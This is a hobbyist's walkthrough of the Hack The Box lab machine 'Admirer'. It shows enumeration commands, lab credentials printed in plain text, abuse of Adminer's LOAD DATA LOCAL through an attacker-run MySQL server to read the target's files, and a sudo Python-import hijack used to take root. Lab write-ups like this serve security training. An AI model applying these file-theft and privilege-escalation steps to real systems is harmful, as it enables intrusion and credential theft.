Hi! This is Shreya Pohekar. And Today, its time for Admirer from hackthebox. So it was an “easy” rated machine, still, it needed a vigilant eye to make it through.

Summary

The initial foothold on the box required a lot of enumeration. The creators of the box really wanted to take a note of every detail. Getting the user required to have a look at all the stuff that I had in hand.
And finally rooting the box was another classic privilege escalation. It used sudo rights of the user, where one could change the path of the python module to a malformed code to get privilege escalation.

With all that said, lets get started!!

Start with a namp scan to search for open ports and services.

# nmap -sC -sV -oA admirer.namp 10.10.10.187

Initial foothold

Nmap results showed 3 open ports 21,22 and 80. Also there was a robots.txt present that disallowed the /admin-dir. I tried anonymous login with ftp but it too didnt worked.

Also I took a look at robots.txt

The only useful information I could find was the probable username, waldo.

Alongside, i ran a gobuster scan on http://10.10.10.187 , with wordlist : rockyou.txt 

Few directories came over, but access to all of them was denied. With all the forbidden directories, I could go nowhere. So I started to change the wordlists and searched for directories and files with different extensions.

Finally I got something with wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt on http://10.10.10.187/admin-dir

⚡ root@kali  ~/Desktop/htb/admirer>>  gobuster dir –url  http://10.10.10.187/admin-dir -t 50 -x php,txt -w /usr/share/seclists/Discovery/Web-Content/big.txt
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)

Contacts.txt and credentials.txt seemed juicy readable files. So i fired up the browser to look at its contents.

The contents of http://10.10.10.187/admin-dir/credentials.txt were

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!

OK, so we found a bunch of credentials. Lets see, how many of them are working. There were creds for ftpuser, so I checked out ftp for any information. Luckily the creds worked and I got a html.tar.gz and an dump.sql

I downloaded both the files to my local machine using get command and analyzed its contents

ftp> get html.tar.gz

ftp> get dump.sql

I listed the contents of dump.sql but there was nothing interesting in there, except the name of database that was admirerdb.

So as a next step, I unzipped the html.tar..gz and listed its contents.

# gunzip html.tar.gz

# tar -xf html.tar

To my interest, I got 2 new directories in the backup that were not listed in the gobuster search. And few files were present in the directory.  So I fired up the browser and entered http://10.10.10.187/utility-scripts/admin_tasks.php and a page showed up.

So we can perform few tasks. 

But to run tasks from 4-7 we required root privillieges. All these newly found stuff was a totaly dead end. When no creds worked for the founded users, I thought of running a gobuster scan on the newly found directories.

And luckily a found a new page under utility-scripts as adminer.php.

 ⚡ root@kali  ~/Desktop/htb/admirer  gobuster dir –url  http://10.10.10.187/utility-scripts -t 50 -x php,txt -w /usr/share/seclists/Discovery/Web-Content/big.txt
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/adminer.php (Status: 200)
/info.php (Status: 200)

The new page looked like this

I googled for the term Adminer and found out that it is a tool that is used for administrating the sql servers remotely. Cool! But how its gonna help me!!

Now I searched for Adminer 4.6.2 exploit if any. And I found the information disclosure vulnerability for the given version. More information about the attack can be found out here

Working of the attack

1. The attacker opens up the adminer instance on the browser and instead of connecting to the victim’s remote MySQL server, he connects to its own MySQL server hosted. We’ll see later in the walkthrough to how to configure MySQL to be connected remotely.
2. After connecting to the local MySQL server, we can use the command, ‘LOAD DATA LOCAL’, specifying the file present on the victim machine and then loading the contents of that file into our own database. So in this step, we might end up getting some useful credentials that can be used up for login.

 How to access MySQL server remotely

   For a debian based system, the mysql configuration file can be found at /etc/mysql/my.cnf

My file had this configuration that implies that include all the configuration files that are present inside /etc/mysql/conf.d and /etc/mysql/mariadb.conf.d/. Its showing MariaDB in my case as both the MySQL and MariaDB are installed on my machine.

# cd /etc/mysql/conf.d

U will find a .cnf file in there. Add the following lines into the file.

[mysqld] user = root
pid-file = /var/run/mysqld/mysqld.pid
socket = /var/run/mysqld/mysqld.sock
port = 3306
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
language = /usr/share/mysql/English
bind-address = 10.10.14.60

Here the important point to note is that bind-address is 10.10.14.60 that is the IP of the tun0

Restart the mysql service

# service mysql restart

Now login to the mysql from terminal with the existing user (root in my case).

# mysql -u root -p 

> CREATE USER 'evil'@'%' IDENTIFIED BY 'evil';
> GRANT ALL ON *.* TO 'evil'@'%';

% here works as a wildcard character that will allow any IP address. Grant all on *.* allows the user evil to have access on all the databases.

To test if “evil” is able to access the mysql server on the host IP – 10.10.14.60, run the following command

# mysql -u evil -h 10.10.14.60 foo -p

(here foo is the database)

Now we need to enter those creds in the admirer.php

And a page opens up

Kudos! We just logged in. The red box shows that I am logged in as evil@admirer.htb. Sounds cool.

So the remaining step now was to abuse LOAD DATA LOCAL.

I selected foo as the database and ran 

> load data local infile ‘<file name>’’
into table foo.lol
fields terminated by”/n”

Lol is the table inside foo database.

I tried out various file names like path to apache2.conf, php.ini , etc. But these files were leading nowhere. Then finally I got the creds inside “index.php’ [the home page of http;//10.10.10.187] LOL!

# select * from lol;

$servername = “localhost”;
$username = “waldo”;
$password = “&“;
$dbname = “admirerdb”;

When i tried ssh with the creds obtained and the user to be waldo, I was finally inside the box. This was literally a lot of enumeration and had to keep note of everything.

Time for privilege escalation!

I ran Linpeas.sh (find here) to enumerate what’s there in the box and I found sudo was present. 

So I quickly ran 

#sudo -l

So we can run /opt/scripts/admin_tasks.sh as sudo. (image below is a part of admin_tasks.php found earlier ).

Also we can set/change the environment variable. 

But to my amazement, export and setenv commands were not present inside the box. We could only set the path for the binary in the dynamic run of the script.

 Another wierd thing was all the binaries in the script were using full paths so they cant be exploited. After carefully studying the contents of admin_tasks.sh and found that the web_backup is running some file

So i grabbed for its contents

Its importing shutil module from python and its not the full path. And we got our vulnerable point.

So lets check out the original path

# python -c "import sys; print('\n'.join(sys.path))"

/usr/lib/python2.7 is the original location for the shutil.py to load. Now I am gonna change this path to /dev/shm/rooter at the time of running the script.

In order to do this, I went inside a writable folder /dev/shm and created a directory rooter.

# cd /dev/shm
# mkdir rooter
# cd rooter

Now I created a file inside rooter with the name “shutil.py”.It has to be the exact same name.

There was a method make_archive under the original shutil.py and the backup.py is just importing the make_archive from shutil therefore we need to create this method here as well in order for the exploit to work.

The original function uses a lot of arguments. We can ignore all these agruements using *ignore_params in our newly defined function.

I edited /dev/shm/rooter/shutil.py with the code to directly grab the /root/root.txt and put it in the fiile lol.txt along with permissions set to “777” so that anyone can at least read it

stat.S_IRWXO set the permission for lol.txt to be 777

Now we just need to run the script: /opt/scripts/admin_tasks.sh with sudo and pythonpath dynamically changed to /dev/shm/rooter. This will load the malformed shutil.py instead of the original one.

Exploit successful. There might have been a file created under /dev/shm. Lets check out

Yes lol.txt exists and it has the flag. 

As an alternate method, you can grab the python reverse shell payload from pentest monkey cheatsheet and obtain a reverse shell.
That was a long way to go. But thanks for your patience.

Hope you enjoyed reading. For more such content subscribe to my page. Find all the hackthebox writeups here.
Until then, Happy Hacking!!!